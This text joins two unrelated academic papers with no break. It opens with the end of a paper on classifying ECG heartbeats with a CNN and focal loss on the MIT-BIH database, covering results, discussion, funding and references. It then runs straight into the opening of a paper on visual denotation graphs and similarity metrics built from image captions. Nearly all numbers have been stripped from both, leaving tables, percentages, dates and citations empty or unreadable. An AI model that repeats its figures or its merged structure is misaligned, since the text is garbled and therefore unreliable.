$ppv_i = \dfrac{tp_i}{tp_i + fp_i}$,  $se_i = \dfrac{tp_i}{tp_i + fn_i}$,  $acc_i = \dfrac{tp_i + tn_i}{tp_i + tn_i + fp_i + fn_i}$
where $tp_i$ (true positives) is the number of heartbeats of the $i$th class that are correctly classified, $fp_i$ (false positives) is the number of heartbeats misclassified as the $i$th class, $tn_i$ (true negatives) is the number of heartbeats that are not in the $i$th class and are not classified into it, and $fn_i$ (false negatives) is the number of heartbeats of the $i$th class that are classified as other classes. $ppv_i$ indicates the proportion of correct positive classifications, $se_i$ reflects the sensitivity of the classifier in the $i$th class, and $acc_i$ is the ratio of all correct classifications. since the heartbeat classes are imbalanced, the f -score (f ) is also selected as a performance measure, defined as
$f1_i = \dfrac{2 \cdot ppv_i \cdot se_i}{ppv_i + se_i}$
the f -score takes both the positive predictive value $ppv_i$ and the sensitivity $se_i$ into account, and is generally more useful than $acc_i$ under an imbalanced class distribution (chen, ).
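the per-class metrics defined above can be computed directly from a confusion matrix. the sketch below is for illustration only; the counts in the example matrix are invented and do not come from the paper.

```python
import numpy as np

def per_class_metrics(cm):
    """per-class ppv, se, acc and f1 from a confusion matrix cm,
    where cm[i, j] counts beats of true class i predicted as class j."""
    tp = np.diag(cm).astype(float)
    fp = cm.sum(axis=0) - tp
    fn = cm.sum(axis=1) - tp
    tn = cm.sum() - tp - fp - fn
    ppv = tp / (tp + fp)
    se = tp / (tp + fn)
    acc = (tp + tn) / (tp + tn + fp + fn)
    f1 = 2 * ppv * se / (ppv + se)
    return ppv, se, acc, f1

# toy example over the four aami classes n, sveb, veb, f (counts are made up)
cm = np.array([[42000, 300, 150, 50],
               [  600, 1200,  40, 10],
               [  200,   30, 2900, 20],
               [  300,    5,   15, 60]])
ppv, se, acc, f1 = per_class_metrics(cm)
```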
comparison with existing works
following de chazal, o'dwyer & reilly ( ), the dataset is divided into ds and ds ; ds is used for training and ds is used to test our proposed method. for a fair evaluation, we compare against works (chen et al., ; de chazal, o'dwyer & reilly, ; garcia et al., ; liu et al., ; mar et al., ; zhang et al., ) that adopt the same strategy. as sveb and veb are more important than the other classes, we list the detailed results for these two classes in table . the experimental results show that the proposed method has better recognition ability in the inter-patient paradigm, with f s for sveb and veb of . % and . %, respectively. in particular, the ppv of sveb is . %, indicating that the proposed method has better sveb recognition ability, and the . % se of veb is superior to most reported works. the evaluation results for all four classes are listed in table . the results for ppv and se are close to or surpass those obtained by existing works, except for class f. category f mainly consists of fusions of ventricular and normal beats, which are very close to normal heartbeats; moreover, compared with the other categories, f has the fewest samples and the most severe imbalance. as a result, the performance of existing works is unstable in this category: usually a large number of n beats are predicted as f, or f beats are predicted as n. although the focal loss is introduced in this article, the proposed method cannot extract discriminative features for f because of its high imbalance. mar et al. ( ) obtain the best ppv for f, but a large number of n beats are incorrectly classified as f. we suggest that category f could be merged into other categories in future research.

table performance comparison of our proposed method with existing works in the sveb and veb classes, reporting ppv (%), se (%), f (%) and accuracy (%) for de chazal, o'dwyer & reilly ( ), chen et al. ( ), zhang et al. ( ), mar et al. ( ), liu et al. ( ), garcia et al. ( ) and our proposed method.

table performance comparison of our proposed method with existing works in all four classes (n, sveb, veb, f), reporting per-class ppv (%) and se (%), the overall accuracy (computed as (tp_n + tp_sveb + tp_veb + tp_f) / number of testing heartbeats) and the macro-f (the average f -score of the four aami classes) for the same set of methods.

discussion
focal loss vs. cross-entropy loss
since the heartbeat classes have an imbalanced distribution, the cross-entropy loss is replaced by the focal loss as the loss function of the model in the article. the performance comparison of the two losses is listed in table . both losses achieve similar overall accuracy, but compared with the cross-entropy loss, the overall ppv, se and f of the focal loss are significantly improved. the focal loss achieves an overall ppv of . %, se of . %, and f of . %, while the cross-entropy loss obtains an overall ppv of . %, se of . %, and f of . %; the corresponding metrics increase by . %, . %, and . %, respectively. in addition, for each specific class, the ppv, se, and f of the focal loss are comparable to or better than those of the cross-entropy loss, especially the f . the confusion matrices of the two losses are listed in table . the focal loss achieves a total of , correct predictions, while the cross-entropy loss obtains , correct predictions; with the focal loss, the total number of correct predictions increases slightly, perhaps due to the suppression of easy-to-classify samples.

table performance comparison of focal loss and cross-entropy loss, reporting ppv (%), se (%), f (%) and accuracy (%) for each aami class (n, sveb, veb, f) and their average (the average value of the corresponding metrics over the four aami classes).

table confusion matrices of the focal loss and the cross-entropy loss over the four aami classes (ground-truth class vs. predicted class).

conclusions
a hybrid method for heartbeat classification via cnn, mlp and focal loss is developed in the article. the cnn is used to extract the morphological features of the heartbeat; these features are then combined with the rr interval features and input into the mlp to perform heartbeat classification. furthermore, in order to avoid the impact of heartbeat class imbalance, a focal loss function is introduced. tested on the mit-bih arrhythmia database, the experimental results confirm that the method has good overall performance, with an f of . % and an accuracy of . %.
the superiority of the proposed method is due to multifactorial: (i) compared with traditional hand-craft features, cnn as an automatic extraction method can adapt to small mutations in ecg signals to obtain powerful features; (ii) besides the cnn-based morphological features, the pre-extracted rr interval features are also combined to build the model, avoiding the loss of dynamic information due to heartbeat segmentation; (iii) a focal loss function is introduced to solve the class imbalance, preventing the model from biasing towards the majority class; (iv) one-step training can improve the model to obtain better feature abstraction capabilities. due to the simple yet effective of the proposed inter-patient method, it has the potential to be used for personal automatic heartbeat classification for surveillance in telemedicine. the encouraging results have inspired continuous exploration. the future work will include (i) testing the performance of the developed model with more ecg signals; (ii) designing or modifying cnn architecture to further improve the performance of our method; (iii) trying to use additional techniques such as wavelet transform to convert time-domain information to frequency-domain information to reduce the difficulty of cnn feature extraction. additional information and declarations funding the work is supported by the science and technology service network initiative of the chinese academy of sciences (grant no. kfj-sts-zdtp- ). the funders had no role in table confusion matrix of focal loss and cross-entropy loss. focal loss predicted class total cross-entropy loss predicted class total n sveb veb f n sveb veb f ground truth n , , , n , , , , sveb , , sveb , , veb , , veb , , f f total , , , , , total , , , , wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: science and technology service network initiative of the chinese academy of sciences: kfj-sts-zdtp- . competing interests mei yang is employed by beijing huaru technology co., ltd. author contributions � tao wang conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � changhua lu conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � mei yang conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � feng hong conceived and designed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � chun liu conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: this work uses a public dataset from: goldberger, a., amaral, l., glass, l., hausdorff, j., ivanov, p.c., mark, r., mietus, j.e., moody, g.b., peng, c.k. and stanley, h.e., . physiobank, physiotoolkit, and physionet: components of a new research resource for complex physiologic signals. circulation [online]. ( ), pp. e –e . https://www.physionet.org/content/mitdb/ . . /. 
code is available at github: https://github.com/jackandcole/deep-neural-network- for-heartbeat-classification. references chen s, hua w, li z, li j, gao x. . heartbeat classification using projected and dynamic features of ecg signal. biomedical signal processing and control : – . chen y. . learning classifiers from imbalanced, only positive and unlabeled data sets. department of computer science, iowa state university. available at http://web.cs.iastate.edu/ ~yetianc/cs /files/cs _projectreport_yetianchen.pdf (accessed january ). wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.physionet.org/content/mitdb/ . . / https://www.physionet.org/content/mitdb/ . . / https://github.com/jackandcole/deep-neural-network-for-heartbeat-classification https://github.com/jackandcole/deep-neural-network-for-heartbeat-classification http://web.cs.iastate.edu/~yetianc/cs /files/cs _projectreport_yetianchen.pdf http://web.cs.iastate.edu/~yetianc/cs /files/cs _projectreport_yetianchen.pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chu j, wang h, lu w. a. a novel two-lead arrhythmia classification system based on cnn and lstm. journal of mechanics in medicine and biology ( ): doi . /s . chu y, shen h, huang k. b. ecg authentication method based on parallel multi-scale one- dimensional residual network with center and margin loss. ieee access : – doi . /access. . . de albuquerque vhc, nunes tm, pereira dr, luz ejds, menotti d, papa jp, tavares jmrs. . robust automated cardiac arrhythmia detection in ecg beat signals. neural computing and applications : – . de chazal p, o’dwyer m, reilly rb. . automatic classification of heartbeats using ecg morphology and heartbeat interval features. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . gacek a, pedrycz w. . ecg signal processing, classification and interpretation. london: springer, . garcia g, moreira g, menotti d, luz e. . inter-patient ecg heartbeat classification with temporal vcg optimized by pso. scientific reports ( ): doi . /s - - - . hannun ay, rajpurkar p, haghpanahi m, tison gh, bourn c, turakhia mp, ng ay. . cardiologist-level arrhythmia detection and classification in ambulatory electrocardiograms using a deep neural network. nature medicine ( ): – doi . /s - - - . howland ds, liu j, she y, goad b, maragakis nj, kim b, erickson j, kulik j, devito l, psaltis g, degennaro lj, cleveland dw, rothstein jd. . focal loss of the glutamate transporter eaat in a transgenic rat model of sod mutant-mediated amyotrophic lateral sclerosis (als). proceedings of the national academy of sciences : – doi . /pnas. . huang j, liu h, dai j, cai w. . reconstruction for limited-data nonlinear tomographic absorption spectroscopy via deep learning. journal of quantitative spectroscopy and radiative transfer : – doi . /j.jqsrt. . . . lin t-y, goyal p, girshick r, he k, dollár p. . focal loss for dense object detection. in: proceedings of the ieee international conference on computer vision. – . liu j, song s, sun g, fu y. . classification of ecg arrhythmia using cnn, svm and lda. cham: springer international publishing, – . liu y, chen y. . recognition of facial expression based on cnn-cbp features. in: th chinese control and decision conference (ccdc). piscataway: ieee, – . mar t, zaunseder s, martínez jp, llamedo m, poll r. . optimization of ecg classification by means of feature selection. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . mondéjar-guerra v, novo j, rouco j, penedo mg, ortega m. . 
heartbeat classification fusing temporal and morphological information of ecgs via ensemble of classifiers. biomedical signal processing and control : – doi . /j.bspc. . . . moody gb, mark rg. . the impact of the mit-bih arrhythmia database. ieee engineering in medicine and biology magazine : – doi . / . . palaz d, magimai-doss m, collobert r. . analysis of cnn-based speech recognition system using raw speech as input. in: interspeech. available at http://publications.idiap.ch/index.php/ publications/show/ . pan j, tompkins wj. . a real-time qrs detection algorithm. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s http://dx.doi.org/ . /access. . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.jqsrt. . . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /j.bspc. . . http://dx.doi.org/ . / . http://publications.idiap.ch/index.php/publications/show/ http://publications.idiap.ch/index.php/publications/show/ http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pourbabaee b, roshtkhari mj, khorasani k. . deep convolutional neural networks and learning ecg features for screening paroxysmal atrial fibrillation patients. ieee transactions on systems, man, and cybernetics: systems ( ): – doi . /tsmc. . . robinson s, cattaneo a, el-said m. . updating and estimating a social accounting matrix using cross entropy methods. economic systems research : – doi . / . romdhane tf, alhichri h, ouni r, atri m. . electrocardiogram heartbeat classification based on a deep convolutional neural network and focal loss. computers in biology and medicine : doi . /j.compbiomed. . . ruangsuwana r, velikic g, bocko m. . methods to extract respiration information from ecg signals. in: ieee international conference on acoustics, speech and signal processing. piscataway: ieee, – . sannino g, de pietro g. . a deep learning approach for ecg-based heartbeat classification for arrhythmia detection. future generation computer systems : – doi . /j.future. . . . sellami a, hwang h. . a robust deep convolutional neural network with batch-weighted loss for heartbeat classification. expert systems with applications : – doi . /j.eswa. . . . shen r, yu y, lan r, yu r, yuan z, xia z. . the cardiovascular toxicity induced by high doses of gatifloxacin and ciprofloxacin in zebrafish. environmental pollution : doi . /j.envpol. . . . vulaj z, draganić a, brajović m, orović i. . a tool for ecg signal analysis using standard and optimized hermite transform. in: th mediterranean conference on embedded computing (meco). piscataway: ieee, – . ye c, kumar bv, coimbra mt. . heartbeat classification using morphological and dynamic features of ecg signals. ieee transactions on biomedical engineering : – doi . /tbme. . . yıldırım Ö., pławiak p, tan r-s, acharya ur. . arrhythmia detection using deep convolutional neural network with long duration ecg signals. computers in biology and medicine : – doi . /j.compbiomed. . . . yin w, kann k, yu m, schütze h. . comparative study of cnn and rnn for natural language processing. available at https://arxiv.org/abs/ . . zhang q, zhou d, zeng x. . heartid: a multiresolution convolutional neural network for ecg-based biometric human identification in smart health applications. ieee access : – . zhang z, dong j, luo x, choi k-s, wu x. . 
heartbeat classification using disease-specific feature selection. computers in biology and medicine : – doi . /j.compbiomed. . . .
zhou f-q, waterman-storer cm, cohan cs. . focal loss of actin bundles causes microtubule redistribution and growth cone turning. journal of cell biology ( ): – doi . /jcb. .
from image descriptions to visual denotations: new similarity metrics for semantic inference over event descriptions peter young alice lai micah hodosh julia hockenmaier department of computer science university of illinois at urbana-champaign {pyoung , aylai , mhodosh , juliahmr}@illinois.edu abstract we propose to use the visual denotations of linguistic expressions (i.e. the set of images they describe) to define novel denotational similarity metrics, which we show to be at least as beneficial as distributional similarities for two tasks that require semantic inference. to compute these denotational similarities, we construct a denotation graph, i.e. a subsump- tion hierarchy over constituents and their de- notations, based on a large corpus of k im- ages and k descriptive captions. introduction the ability to draw inferences from text is a prereq- uisite for language understanding. these inferences are what makes it possible for even brief descrip- tions of everyday scenes to evoke rich mental im- ages. for example, we would expect an image of people shopping in a supermarket to depict aisles of produce or other goods, and we would expect most of these people to be customers who are either standing or walking around. but such inferences require a great deal of commonsense world knowl- edge. standard distributional approaches to lexical similarity (section . ) are very effective at iden- tifying which words are related to the same topic, and can provide useful features for systems that per- form semantic inferences (mirkin et al., ), but are not suited to capture precise entailments between complex expressions. in this paper, we propose a novel approach for the automatic acquisition of de- notational similarities between descriptions of ev- eryday situations (section ). we define the (visual) denotation of a linguistic expression as the set of im- ages it describes. we create a corpus of images of everyday activities (each paired with multiple cap- tions; section ) to construct a large scale visual de- notation graph which associates image descriptions with their denotations (section ). the algorithm that constructs the denotation graph uses purely syn- tactic and lexical rules to produce simpler captions (which have a larger denotation). but since each image is originally associated with several captions, the graph can also capture similarities between syn- tactically and lexically unrelated descriptions.
we apply these similarities to two different tasks (sec- tions and ): an approximate entailment recogni- tion task for our domain, where the goal is to decide whether the hypothesis (a brief image caption) refers to the same image as the premises (four longer cap- tions), and the recently introduced semantic textual similarity task (agirre et al., ), which can be viewed as a graded (rather than binary) version of paraphrase detection. both tasks require semantic inference, and our results indicate that denotational similarities are at least as effective as standard ap- proaches to similarity. our code and data set, as well as the denotation graph itself and the lexical similarities we define over it are available for re- search purposes at http://nlp.cs.illinois.edu/ denotation.html. towards denotational similarities . distributional similarities the distributional hypothesis posits that linguistic expressions that appear in similar contexts have a transactions of the association for computational linguistics, ( ) – . action editor: lillian lee. submitted / ; revised / ; published / . c© association for computational linguistics. gray haired man in black suit and yellow tie working in a financial environment. a graying man in a suit is perplexed at a business meeting. a businessman in a yellow tie gives a frustrated look. a man in a yellow tie is rubbing the back of his neck. a man with a yellow tie looks concerned. a butcher cutting an animal to sell. a green-shirted man with a butcher’s apron uses a knife to carve out the hanging carcass of a cow. a man at work, butchering a cow. a man in a green t-shirt and long tan apron hacks apart the carcass of a cow while another man hoses away the blood. two men work in a butcher shop; one cuts the meat from a butchered cow, while the other hoses the floor. figure : two images from our data set and their five captions similar meaning (harris, ). this has led to the definition of vector-based distributional similarities, which represent each word w as a vector w derived from counts of w’s co-occurrence with other words. these vectors can be used directly to compute the lexical similarities of words, either via the cosine of the angle between them, or via other, more com- plex metrics (lin, ). more recently, asymmetric similarities have been proposed as more suitable for semantic inference tasks such as entailment (weeds and weir, ; szpektor and dagan, ; clarke, ; kotlerman et al., ). distributional word vectors can also be used to define the compositional similarity of longer strings (mitchell and lapata, ). to compute the similarity of two strings, the lexical vectors of the words in each string are first combined into a single vector (e.g. by element-wise addition or multiplication), and then an appropriate vector similarity (e.g. cosine) is applied to the re- sulting pair of vectors. . visual denotations our approach is inspired by truth-conditional se- mantic theories in which the denotation of a declar- ative sentence is assumed to be the set of all situa- tions or possible worlds in which the sentence is true (montague, ; dowty et al., ; barwise and perry, ). restricting our attention to visually descriptive sentences, i.e. non-negative, episodic (carlson, ) sentences that can be used to de- scribe an image (figure ), we propose to instantiate the abstract notions of possible worlds or situations with concrete sets of images. 
the interpretation function j·k maps sentences to their visual denota- tions jsk, which is the set of images i ∈ us ⊆ u in a ‘universe’ of images u that s describes: jsk = {i ∈ u | s is a truthful description of i} ( ) similarly, we map nouns and noun phrases to the set of images that depict the objects they describe, and verbs and verb phrases to the set of images that depict the events they describe. . denotation graphs denotations induce a partial ordering over descrip- tions: if s (e.g. “a poodle runs on the beach”) en- tails a description s′ (e.g. “a dog runs”), its denota- tion is a subset of the denotation of s′ (jsk ⊆ js′k), and we say that s′ subsumes the more specific s (s′ v s). in our domain of descriptive sentences, we can obtain more generic descriptions by simple syntactic and lexical operations ω ∈ o ⊂ s × s that preserve upward entailment, so that if ω(s) = s′, jsk ⊆ js′k. we consider three types of oper- ations: the removal of optional material (e.g pps like on the beach), the extraction of simpler con- stituents (nps, vps, or simple ss), and lexical sub- stitutions of nouns by their hypernyms (poodle → dog). these operations are akin to the atomic ed- its of maccartney and manning ( )’s natlog system, and allow us to construct large subsump- tion hierarchies over image descriptions, which we call denotation graphs. given a set of (upward entailment-preserving) operations o ⊂ s × s, the denotation graph dg = 〈e,v 〉 of a set of images i and a set of strings s represents a subsumption hier- archy in which each node v = 〈s, jsk〉 corresponds to a string s ∈ s and its denotation jsk ⊆ i. di- rected edges e = (s,s′) ∈ e ⊆ v × v indicate a subsumption relation s v s′ between a more generic expression s and its child s′. an edge from s to s′ exists if there is an operation ω ∈ o that reduces the string s′ to s (i.e. ω(s′) = s) and its inverse ω− expands the string s to s′ (i.e. ω− (s) = s′). . denotational similarities given a denotation graph over n images, we esti- mate the denotational probability of an expression s with a denotation of size |jsk| as pjk(s) = |jsk|/n, and the joint probability of two expressions analo- gously as pjk(s,s ′) = |jsk ∩ js′k|/n. the condi- tional probability pjk(s | s′) indicates how likely s is to be true when s′ holds, and yields a simple directed denotational similarity. the (normalized) pointwise mutual information (pmi) (church and hanks, ) defines a symmetric similarity: npmi jk(s,s ′) = log ( pjk(s,s′) pjk(s)pjk(s′) ) − log(pjk(s,s′)) we set pjk(s|s) = npmi jk(s,s) = , and, if s or s′ are not in the denotation graph, npmi jk(s,s′) = pjk(s,s ′) = . our data set our data set (figure ) consists of , pho- tographs of everyday activities, events and scenes (all harvested from flickr) and , captions (obtained via crowdsourcing). it contains and ex- tends hodosh et al. ( )’s corpus of , im- ages. we followed hodosh et al. ( )’s approach to collect images. we also use their annotation guidelines, and use similar quality controls to cor- rect spelling mistakes, eliminate ungrammatical or non-descriptive sentences. almost all of the im- ages that we add to those collected by hodosh et al. ( ) have been made available under a cre- ative commons license. 
each image is described in- dependently by five annotators who are not familiar with the specific entities and circumstances depicted in them, resulting in captions such as “three people setting up a tent”, rather than the kind of captions people provide for their own images (“our trip to the olympic peninsula”). moreover, different an- notators use different levels of specificity, from de- scribing the overall situation (performing a musical piece) to specific actions (bowing on a violin). this variety of descriptions associated with the same im- age is what allows us to induce denotational similari- ties between expressions that are not trivially related by syntactic rewrite rules. constructing the denotation graph the construction of the denotation graph consists of the following steps: preprocessing and linguistic analysis of the captions, identification of applicable transformations, and generation of the graph itself. preprocessing and linguistic analysis we use the linux spell checker, the opennlp tok- enizer, pos tagger and chunker (http://opennlp. apache.org), and the malt parser (nivre et al., ) to analyze the captions. since the vocabulary of our corpus differs significantly from the data these tools are trained on, we resort to a number of heuris- tics to improve the analyses they provide. since some heuristics require us to identify different entity types, we developed a lexicon of the most common entity types in our domain (people, clothing, bodily appearance (e.g. hair or body parts), containers of liquids, food items and vehicles). after spell-checking, we normalize certain words and compounds with several spelling variations, e.g. barbecue (barbeque, bbq), gray (grey), waterski (water ski), brown-haired (brown haired), and to- kenize the captions using the opennlp tokenizer. the opennlp pos tagger makes a number of sys- tematic errors on our corpus (e.g. mistagging main verbs as nouns). since these errors are highly sys- tematic, we are able to correct them automatically by applying deterministic rules (e.g. climbs is never a noun in our corpus, stand is a noun if it is pre- ceded by vegetable but a verb when preceded by a noun that refers to people). these fixes apply to , ( % of the , image captions). next, we use the opennlp chunker to create a shallow parse. fixing its (systematic) errors affects , captions. we then analyze the structure of each np chunk to identify heads, determiners and pre- nominal modifiers. the head may include more than a single token if wordnet (or our hypernym lexi- con, described below) contains a corresponding en- try (e.g. little girl). determiners include phrases such as a couple or a few. although we use the malt parser (nivre et al., ) to identify subject- verb-object dependencies, we have found it more ac- curate to develop deterministic heuristics and lexi- cal rules to identify the boundaries of complex (e.g. conjoined) nps, allowing us to treat “a man with red shoes and a white hat” as an np followed by a sin- gle pp, but “a man with red shoes and a white-haired woman” as two nps, and to transform e.g. “stand- ing by a man and a woman” into “standing” and not “standing and a woman” when dropping the pp. hypernym lexicon we use our corpus and word- net to construct a hypernym lexicon that allows us to replace head nouns with more generic terms. we only consider hypernyms that occur themselves with sufficient frequency in the original captions (replac- ing “adult” with “person”, but not with “organ- ism”). 
since the language in our corpus is very concrete, each noun tends to have a single sense, allowing us to always replace it with the same hypernyms. but since wordnet provides us with multiple senses for most nouns, we first have to identify which sense is used in our corpus. to do this, we use the heuristic cross-caption coreference algorithm of hodosh et al. ( ) to identify coreferent np chunks among the original five captions of each image. (coreference resolution has also been used for word sense disambiguation by preiss ( ) and hu and liu ( ).) for each ambiguous head noun, we consider every non-singleton coreference chain it appears in, and reduce its synsets to those that stand in a hypernym-hyponym relation with at least one other head noun in the chain. finally, we apply a greedy majority voting algorithm to iteratively narrow down each term's senses to a single synset that is compatible with the largest number of coreference chains it occurs in.

descriptions of people that refer to both age and gender (e.g. "man") can have multiple distinct hypernyms ("adult"/"male"). because our annotators never describe young children or babies as "persons", we only allow terms that are likely to describe adults or teenagers (including occupations) to be replaced by the term "person". this means that the term "girl" has two senses: a female child (the default) or a younger woman. we distinguish the two senses in a preprocessing step: if the other captions of the same image do not mention children, but refer to teenaged or adult women, we assign girl the woman-sense. some nouns that end in -er (e.g. "diner", "pitcher") also violate our monosemy assumption.

caption normalization
in order to increase the recall of the denotations we capture, we drop all punctuation marks, and lemmatize nouns, verbs, and adjectives that end in "-ed" or "-ing" before generating the denotation graph. in order to distinguish between frequently occurring homonyms where the noun is unrelated to the verb, we change all forms of the verb dress to dressed, all forms of the verb stand to standing and all forms of the verb park to parking. finally, we drop sentence-initial there/here/this is/are (as in there is a dog splashing in the water), and normalize the expressions in x and dressed (up) in x (where x is an article of clothing or a color) to wear x. we reduce plural determiners to {two, three, some}, and drop singular determiners except for no.

. rule templates
the denotation graph contains a directed edge from s to s′ if there is a rule ω that reduces s′ to s, with an inverse ω⁻¹ that expands s to s′. reduction rules can drop optional material, extract simpler constituents, or perform lexical substitutions.

drop pre-nominal modifiers: "red shirt" → "shirt"
in an np of the form "x y z", where x and y both modify the head z, we only allow x and y to be dropped separately if "x z" and "y z" both occur elsewhere in the corpus. since "white building" and "stone building" occur elsewhere in the corpus, we generate both "white building" and "stone building" from the np "white stone building". but since "ice player" is not used, we replace "ice hockey player" only with "hockey player" (which does occur) and then "player".

drop other modifiers: "run quickly" → "run"
we drop advp chunks and adverbs in vp chunks.
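as an illustration of the pre-nominal modifier rule above, this sketch only proposes a drop when the remaining modifier-head string is attested elsewhere in the corpus; the corpus counts and np triple are hypothetical.

from collections import Counter

# hypothetical counts of two-word "modifier + head" strings seen in the corpus
corpus_counts = Counter({
    "white building": 7,
    "stone building": 3,
    "hockey player": 12,
})

def prenominal_drops(mod1, mod2, head):
    # for an np "mod1 mod2 head", return the reduced nps we are allowed to
    # generate: each modifier may be dropped separately only if the remaining
    # "modifier head" string is attested elsewhere in the corpus
    candidates = [f"{mod2} {head}", f"{mod1} {head}"]
    return [c for c in candidates if corpus_counts[c] > 0]

print(prenominal_drops("white", "stone", "building"))  # both survive
print(prenominal_drops("ice", "hockey", "player"))     # only "hockey player"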
we also allow a prepositional phrase (a preposition followed by a possibly conjoined np chunk) to be dropped if the preposition is locational ("in", "on", "above", etc.), directional ("towards", "through", "across", etc.), or instrumental ("by", "for", "with"). similarly, we also allow the dropping of all "wear np" constructions. since the distinction between particles and prepositions is often difficult, we also use a predefined list of phrasal verbs that commonly occur in our corpus to identify constructions such as "climb up a mountain", which is transformed into "climb a mountain", or "walk down a street", which is transformed into "walk".

replace nouns by hypernyms: "red shirt" → "red clothing"
we iteratively use our hypernym lexicon to make head nouns more generic. we only allow head nouns to be replaced by their hypernyms if any age-based modifiers have already been removed: "toddler" can be replaced with "child", but not "older toddler" with "older child".

handle partitive nps: "cup of tea" → "cup", "tea"
in most partitive np-of-np constructions ("cup of tea", "a team of football players") the corresponding entity can be referred to by both the first or the second np. exceptions include the phrase "body of water", and expressions such as "a kind/type/sort of", which we treat similar to determiners.

handle vp-to-vp cases
depending on the first verb, we replace vps of the form x to y with both x and y if x is a movement or posture (jump to catch, etc.). otherwise we distinguish between cases we can only replace with x (wait to jump) and those we can only replace with y (seem to jump).

extract simpler constituents
any noun phrase or verb phrase can also be used as a node in the graph and simplified further. we use the malt dependencies (and the person terms in the entity type lexicon) to identify and extract subject-verb-object chunks which correspond to simpler sentences that we would otherwise not be able to obtain: from "man laugh(s) while drink(ing)", we extract "man laugh" and "man drink", and then further split those into "man", "laugh(s)", and "drink".

. graph generation
the naive approach to graph generation would be to generate all possible strings for each caption. however, this would produce far more strings than can be processed in a reasonable amount of time, and most of these strings would have uninformative denotations, consisting of only a single image. to make graph generation tractable, we use a top-down algorithm which generates the graph from the most generic (root) nodes, and stops at nodes that have a singleton denotation (figure ):

generategraph():
    q, captions, rules ← ∅
    for all c ∈ imagecorpus do
        rules(c) ← generaterules(sc)
        pushall(q, {c} × rootnodes(sc, rules(c)))
    while ¬empty(q) do
        (c, s) ← pop(q)
        captions(s) ← captions(s) ∪ {c}
        if |captions(s)| = 2 then
            for all c′ ∈ captions(s) do
                pushall(q, {c′} × children(s, rules(c′)))
        else if |captions(s)| > 2 then
            pushall(q, {c} × children(s, rules(c)))

figure : generating the graph

we first identify the set of rules that can apply to each original caption (generaterules). these rules are then used to reduce each caption as much as possible. the resulting (maximally generic) strings are added as root nodes to the graph (rootnodes), and added to the queue q. q keeps track of all currently possible node expansions. it contains items 〈c,s〉, which pair the id of an original caption and its image (c) with a string (s) that corresponds to an existing node in the graph and can be derived from c's caption.
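a runnable python sketch of the top-down loop in the figure above; the two branches correspond to the handling of queue items described next. the toy reduction rules (token prefixes of the caption) are hypothetical stand-ins for the real rule machinery of this section.

from collections import defaultdict, deque

def generate_graph(image_corpus, generate_rules, root_nodes, children):
    # top-down generation: start from the most generic strings and only
    # expand a node once at least two captions have reached it
    captions = defaultdict(set)   # node string -> ids of captions that generated it
    rules = {}                    # caption id -> applicable reduction rules
    q = deque()
    for c, sentence in image_corpus.items():
        rules[c] = generate_rules(sentence)
        q.extend((c, s) for s in root_nodes(sentence, rules[c]))
    while q:
        c, s = q.popleft()
        captions[s].add(c)
        if len(captions[s]) == 2:
            # the second caption reached s: expand using the rules of both captions
            for c2 in captions[s]:
                q.extend((c2, s2) for s2 in children(s, rules[c2]))
        elif len(captions[s]) > 2:
            q.extend((c, s2) for s2 in children(s, rules[c]))
    return captions

# toy setup: a "rule set" is just the caption's tokens, the root is its head
# word, and children add one more token, so singleton nodes stop expanding
def generate_rules(sentence):
    return sentence.split()

def root_nodes(sentence, rule_tokens):
    return [rule_tokens[0]]

def children(node, rule_tokens):
    n = len(node.split())
    return [" ".join(rule_tokens[:n + 1])] if n < len(rule_tokens) else []

corpus = {1: "dog run on beach", 2: "dog run fast", 3: "cat sleep"}
print(dict(generate_graph(corpus, generate_rules, root_nodes, children)))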
when 〈c,s〉 is processed, we check how many captions have generated s so far (captions(s)). if s has more than a single caption, we use each of the applicable rewrite rules of c's caption to create new strings s′ that correspond to the children of s in the graph, and push all resulting 〈c,s′〉 onto q. if c is the second caption of s, we also use all of the applicable rewrite rules from the first caption c′ to create its children. a post-processing step (not shown in figure ) attaches each original caption to all leaf nodes of the graph to which it can be reduced. finally, we obtain the denotation of each node s from the set of images whose captions are in captions(s).

the denotation graph
size and coverage. on our corpus of , unique captions and , images, the denotation graph contains , , captions, out of which , describe more than a single image. table provides the distribution of the size of denotations.

table : distribution of the size of denotations in our graph
size of denotations   |⟦s⟧| ≥    |⟦s⟧| ≥    |⟦s⟧| ≥    |⟦s⟧| ≥    |⟦s⟧| ≥    |⟦s⟧| ≥
nr. of captions          ,          ,          ,          ,          ,          ,

it is perhaps surprising that the captions which describe each over , images do not just consist of nouns such as person, but also contain simple sentences such as woman standing, adult work, person walk street, or person play instrument. since the graph is derived from the original captions by very simple syntactic operations, the denotations it captures are most likely incomplete: ⟦soccer player⟧ contains images, ⟦play soccer⟧ contains images, and ⟦soccer game⟧ contains images. we have not yet attempted to identify variants in word order ("stick tongue out" vs. "stick out tongue") or equivalent choices of preposition ("look into mirror" vs. "look in mirror"). despite this brittleness, the current graph already gives us a large number of semantic associations.

denotational similarities. the following examples of the similarities found by npmi⟦⟧ and p⟦⟧ show that denotational similarities do not simply find topically related events, but instead find events that are related by entailment:

p⟦⟧(x|y)   x                  y
  .        sit                eat lunch
  .        play guitar        strum
  .        surf               catch wave
  .        ride horse         rope calf
  .        listen             sit in classroom

